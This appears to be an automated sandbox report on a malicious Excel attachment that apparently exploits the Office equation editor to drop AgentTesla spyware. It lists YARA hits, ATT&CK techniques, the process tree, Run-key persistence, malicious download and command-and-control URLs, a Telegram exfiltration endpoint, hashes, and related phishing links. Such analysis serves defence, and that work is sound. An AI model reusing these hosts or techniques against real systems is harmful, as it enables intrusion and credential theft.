Source: Yara match | File source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 1616, type: MEMORY
Source: Yara match | File source: 7.2.name.exe.2140000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.2060000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.2060000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.2140000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 1616, type: MEMORY

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
Source: Yara match | File source: Process Memory Space: name.exe PID: 1616, type: MEMORY
Source: Yara match | File source: 7.2.name.exe.2140000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.2060000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Hqfadrv.exe.2060000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.2140000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.name.exe.22e0000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 1 | Input Capture 11 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 1 | Process Injection 112 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Registry Run Keys / Startup Folder 1 | Obfuscated Files or Information 31 | Security Account Manager | System Information Discovery 128 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 2 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 2 | NTDS | Security Software Discovery 26 | Distributed Component Object Model | Clipboard Data 3 | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Virtualization/Sandbox Evasion 13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 13 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

Behavior Graph ID: 323613, Sample: SpecificationX20202611.xlsx, Startdate: 27/11/2020, Architecture: WINDOWS, Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for submitted file; Yara detected AgentTesla; 10 other signatures

Process tree recovered from the graph:

• EXCEL.EXE: dropped C:\Users\...\~$SpecificationX20202611.xlsx (data)
• EQNEDT32.EXE: contacted khunnapap.com (128.199.253.44, ports 49165, 80, DIGITALOCEAN-ASNUS, United Kingdom); dropped C:\Users\user\AppData\Local\...\lxpo[1].exe (PE32) and C:\Users\Public\name.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • cmd.exe (started by EQNEDT32.EXE)
    • name.exe (started by cmd.exe): contacted fanosethiopiatours.com (50.87.153.103, ports 49167, 49169, 49171, UNIFIEDLAYER-AS-1US, United States) and discord.com (162.159.136.232, ports 443, 49166, 49168, CLOUDFLARENETUS, United States); dropped C:\Users\user\AppData\Local\...\Hqfadrv.exe (PE32); signatures: Detected unpacking (changes PE section rights), Detected unpacking (overwrites its own PE header), Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines), 3 other signatures
      • name.exe (child instance started by name.exe)
• Hqfadrv.exe: contacted fanosethiopiatours.com and discord.com; signatures: Detected unpacking (changes PE section rights), Detected unpacking (overwrites its own PE header), Machine Learning detection for dropped file, 2 other signatures
  • Hqfadrv.exe (child instance started by Hqfadrv.exe)
• Hqfadrv.exe (second top-level instance): contacted fanosethiopiatours.com and discord.com

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
SpecificationX20202611.xlsx | 62% | Virustotal |
SpecificationX20202611.xlsx | 53% | ReversingLabs | Win32.Exploit.CVE-2017-11882
SpecificationX20202611.xlsx | 100% | Joe Sandbox ML |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | 100% | Joe Sandbox ML |
C:\Users\Public\name.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe | 100% | Joe Sandbox ML |

                      Unpacked PE Files

Source | Detection | Scanner | Label
10.2.Hqfadrv.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1131223

                      Domains

Source | Detection | Scanner | Label
khunnapap.com | 4% | Virustotal |
discord.com | 1% | Virustotal |
fanosethiopiatours.com | 3% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfafff | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://rMSjwD.com | 0% | Avira URL Cloud | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
khunnapap.com | 128.199.253.44 | true | true | | unknown
discord.com | 162.159.136.232 | true | false | | unknown
fanosethiopiatours.com | 50.87.153.103 | true | false | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfafff | false | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.%s.comPA | name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmp | false | | high
http://gorohov.narod.ru/index.htmS | name.exe, 00000006.00000000.2145781433.0000000000401000.00000020.00020000.sdmp, name.exe, 00000007.00000000.2214244196.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 00000009.00000000.2236985625.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000A.00000000.2254253931.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.dr | false | | high
http://gorohov.narod.ru/index.htm | Hqfadrv.exe, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.dr | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://rMSjwD.com | Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x | name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | | high
https://api.ipify.orgGETMozilla/5.0 | Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
50.87.153.103 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false
162.159.136.232 | unknown | United States | 13335 | CLOUDFLARENETUS | false
128.199.253.44 | unknown | United Kingdom | 14061 | DIGITALOCEAN-ASNUS | true

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:323613
                              Start date:27.11.2020
                              Start time:08:25:51
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SpecificationX20202611.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSX@12/5@11/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 81.9% (good quality ratio 79.4%)
                              • Quality average: 84.3%
                              • Quality standard deviation: 24.5%
                              HCA Information:
                              • Successful, ratio: 73%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              Time | Type | Description
                              08:26:59 | API Interceptor | 675x Sleep call for process: EQNEDT32.EXE modified
                              08:27:08 | API Interceptor | 799x Sleep call for process: name.exe modified
                              08:27:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hqfa C:\Users\user\AppData\Local\afqH.url
                              08:27:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hqfa C:\Users\user\AppData\Local\afqH.url
                              08:27:51 | API Interceptor | 667x Sleep call for process: Hqfadrv.exe modified

                              Joe Sandbox View / Context

                              IPs

                              Match | Associated Sample Name / URL | Detection | Context
                              50.87.153.103 | http://word.eleganthayat.com | malicious | importantdocument.mymensingheducationboard.gov.bd/image/0.jpg?x=a5dbd4393ff6a725c7e62b61df7e72f0
                              162.159.136.232 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious |
                              162.159.136.232 | tzjEwwwbqK.exe | malicious |
                              162.159.136.232 | New Microsoft Office Excel Worksheet.xlsx | malicious |
                              162.159.136.232 | USD67,884.08_Payment_Advise_9083008849.exe | malicious |
                              162.159.136.232 | USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE | malicious |
                              162.159.136.232 | NyUnwsFSCa.exe | malicious |
                              162.159.136.232 | PO#0007507_009389283882873PDF.exe | malicious |
                              162.159.136.232 | D6vy84I7rJ.exe | malicious |
                              162.159.136.232 | LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe | malicious |
                              162.159.136.232 | QgwtAnenic.exe | malicious |
                              162.159.136.232 | qclepSi8m5.exe | malicious |
                              162.159.136.232 | 99GQMirv2r.exe | malicious |
                              162.159.136.232 | 7w6Yl263sM.exe | malicious |
                              162.159.136.232 | 8Ce3uRUjxv.exe | malicious |
                              162.159.136.232 | 187QadygQl.exe | malicious |
                              162.159.136.232 | eybgvwBamW.exe | malicious |
                              162.159.136.232 | R#U00d6SLER Puchase_tcs 10-28-2020,pdf.exe | malicious |
                              162.159.136.232 | Payment of bank details,zip.exe | malicious |
                              162.159.136.232 | Documentos_ordine.exe | malicious |
                              162.159.136.232 | PO CBV87654468,pdf.exe | malicious |

                              Domains

                              Match | Associated Sample Name / URL | Detection | Context
                              discord.com | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 162.159.137.232
                              discord.com | Scan 25112020 pdf.exe | malicious | 162.159.137.232
                              discord.com | Piraeus Bank_swift_.exe | malicious | 162.159.128.233
                              discord.com | Q21rQw2C4o.exe | malicious | 162.159.137.232
                              discord.com | Q21rQw2C4o.exe | malicious | 162.159.128.233
                              discord.com | tzjEwwwbqK.exe | malicious | 162.159.136.232
                              discord.com | DHL_Express_Consignment_Details.exe | malicious | 162.159.138.232
                              discord.com | New Microsoft Office Excel Worksheet.xlsx | malicious | 162.159.136.232
                              discord.com | Komfkim_Signed_.exe | malicious | 162.159.135.232
                              discord.com | oUI0jQS8xQ.exe | malicious | 162.159.137.232
                              discord.com | USD67,884.08_Payment_Advise_9083008849.exe | malicious | 162.159.136.232
                              discord.com | USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE | malicious | 162.159.138.232
                              discord.com | NyUnwsFSCa.exe | malicious | 162.159.135.232
                              discord.com | Fl0aIIH39W.exe | malicious | 162.159.138.232
                              discord.com | PO#0007507_009389283882873PDF.exe | malicious | 162.159.135.232
                              discord.com | 9Pimjl3jyq.exe | malicious | 162.159.138.232
                              discord.com | D6vy84I7rJ.exe | malicious | 162.159.135.232
                              discord.com | RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 162.159.138.232
                              discord.com | Payment Confirmation NOV-85869983TGTTAS.exe | malicious | 162.159.128.233
                              discord.com | LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe | malicious | 162.159.137.232

                              ASN

                              Match | Associated Sample Name / URL | Detection | Context
                              CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Nanocore.23.20965.exe | malicious | 104.23.98.190
                              CLOUDFLARENETUS | SecuriteInfo.com.Mal.Generic-S.26042.exe | malicious | 172.67.143.180
                              CLOUDFLARENETUS | trackinginfo#U007eupdate.jar | malicious | 104.20.23.46
                              CLOUDFLARENETUS | trackinginfo#U007eupdate.jar | malicious | 104.20.22.46
                              CLOUDFLARENETUS | MAL.PPT | malicious | 172.67.219.133
                              CLOUDFLARENETUS | https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTcz | malicious | 104.16.18.94
                              CLOUDFLARENETUS | https://bit.do/fLppr | malicious | 104.27.146.211
                              CLOUDFLARENETUS | SecuriteInfo.com.BehavesLike.Win32.VirRansom.rm.exe | malicious | 104.23.99.190
                              CLOUDFLARENETUS | SecuriteInfo.com.Trojan.KillProc2.14740.25300.exe | malicious | 104.23.99.190
                              CLOUDFLARENETUS | https://rb.gy/flx7ju | malicious | 104.28.9.39
                              CLOUDFLARENETUS | https://bit.ly/3kUgQ0H | malicious | 172.67.131.94
                              CLOUDFLARENETUS | EME_PO.47563.xlsx | malicious | 23.227.38.74
                              CLOUDFLARENETUS | Shipping documents.xlsx | malicious | 104.16.16.194
                              CLOUDFLARENETUS | https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.com | malicious | 162.159.138.81
                              CLOUDFLARENETUS | Nota di consegna_TNT507CC.exe | malicious | 104.18.54.93
                              CLOUDFLARENETUS | txema_inef_post_live_loader_88.exe | malicious | 104.18.35.76
                              CLOUDFLARENETUS | due-invoice.xlsm | malicious | 104.23.98.190
                              CLOUDFLARENETUS | ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.ppt | malicious | 104.18.49.20
                              CLOUDFLARENETUS | SecuriteInfo.com.Gen.NN.ZemsilF.34658.m0@a8V1yrei.exe | malicious | 104.24.126.89
                              CLOUDFLARENETUS | http://nity.midlidl.com/index | malicious | 104.28.14.54
                              DIGITALOCEAN-ASNUS | https://rb.gy/flx7ju | malicious | 138.68.185.92
                              DIGITALOCEAN-ASNUS | Shipping INVOICE-BL Shipment..exe | malicious | 165.227.229.15
                              DIGITALOCEAN-ASNUS | CompensationClaim-261722907-11242020.xls | malicious | 157.245.97.213
                              DIGITALOCEAN-ASNUS | CompensationClaim-261722907-11242020.xls | malicious | 157.245.97.213
                              DIGITALOCEAN-ASNUS | http://searchlf.com | malicious | 82.196.7.246
                              DIGITALOCEAN-ASNUS | Izezma64.dll | malicious | 68.183.89.248
                              DIGITALOCEAN-ASNUS | fuxenm32.dll | malicious | 68.183.89.248
                              DIGITALOCEAN-ASNUS | ebuQ5cmR6y.doc | malicious | 138.197.207.88
                              DIGITALOCEAN-ASNUS | https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45 | malicious | 161.35.15.77
                              DIGITALOCEAN-ASNUS | 22.exe | malicious | 134.122.48.156
                              DIGITALOCEAN-ASNUS | CompensationClaim-310074970-11242020.xls | malicious | 157.245.97.213
                              DIGITALOCEAN-ASNUS | CompensationClaim-310074970-11242020.xls | malicious | 157.245.97.213
                              DIGITALOCEAN-ASNUS | https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.org | malicious | 5.101.109.44
                              DIGITALOCEAN-ASNUS | C03N224Hbu.exe | malicious | 206.189.230.189
                              DIGITALOCEAN-ASNUS | Izipubob.dll | malicious | 68.183.54.143
                              DIGITALOCEAN-ASNUS | http://ttixwac.sed.ocscreenwriter.com | malicious | 138.197.59.238
                              DIGITALOCEAN-ASNUS | nivude1.dll | malicious | 68.183.54.143
                              DIGITALOCEAN-ASNUS | Accesshover.dll | malicious | 68.183.54.143
                              DIGITALOCEAN-ASNUS | https://comvoce.philco.com.br/wp-forum/administracion/prelogin.php | malicious | 157.230.76.65
                              DIGITALOCEAN-ASNUS | https://ilovesanmarzanodop.com/wp-content/uploads/2020/supp/adfs/index.html | malicious | 164.90.215.56
                              UNIFIEDLAYER-AS-1US | document-1654302018.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1654302018.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-176142694.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-176142694.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1710831256.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1773066947.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1773066947.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1758249588.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1758249588.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | https://dealmaker.pl/au_au.html | malicious | 192.185.186.178
                              UNIFIEDLAYER-AS-1US | document-1757513108.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1757513108.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | https://wilkinsonbutler.tallverse.ga/YW1iZXJAd2lsa2luc29uYnV0bGVyLmNvbQ== | malicious | 162.241.126.159
                              UNIFIEDLAYER-AS-1US | https://wilkinsonbutler.tallverse.ga/YW1iZXJAd2lsa2luc29uYnV0bGVyLmNvbQ== | malicious | 162.241.126.159
                              UNIFIEDLAYER-AS-1US | document-1706969672.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1706969672.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1740914998.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1740914998.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1745935583.xls | malicious | 192.185.215.146
                              UNIFIEDLAYER-AS-1US | document-1745935583.xls | malicious | 192.185.215.146

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                              Process:C:\Users\Public\name.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1218752
                              Entropy (8bit):7.109875910384301
                              Encrypted:false
                              SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                              MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                              SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                              SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
                              SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:downloaded
                              Size (bytes):1218752
                              Entropy (8bit):7.109875910384301
                              Encrypted:false
                              SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                              MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                              SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                              SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
